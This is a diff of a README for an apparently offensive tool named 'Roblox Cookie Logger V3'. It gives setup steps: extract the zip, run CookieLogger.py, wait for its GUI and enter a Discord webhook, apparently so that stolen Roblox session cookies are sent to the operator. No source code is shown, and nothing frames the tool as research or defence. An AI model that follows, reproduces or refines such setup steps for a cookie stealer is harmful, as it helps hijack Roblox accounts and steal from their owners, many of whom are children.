zbenntt/Roblox-Cookie-LoggerV3/README.md

 Step 1; Download Zip and extract

-Step 2; Run the requirements file and wait until it finishes and installs all requirements
+Step 2; Go To CMD cd to the directory where you saved CookieLoggerV3.py the run: python3 CookieLogger.py

-Step 3; run the CookieLoggerV3.py file and wait until the gui opens
+Step 3; Wait For gui to load

 Step 4; get your discord webhook and put it in the box that says WEBHOOK_HERE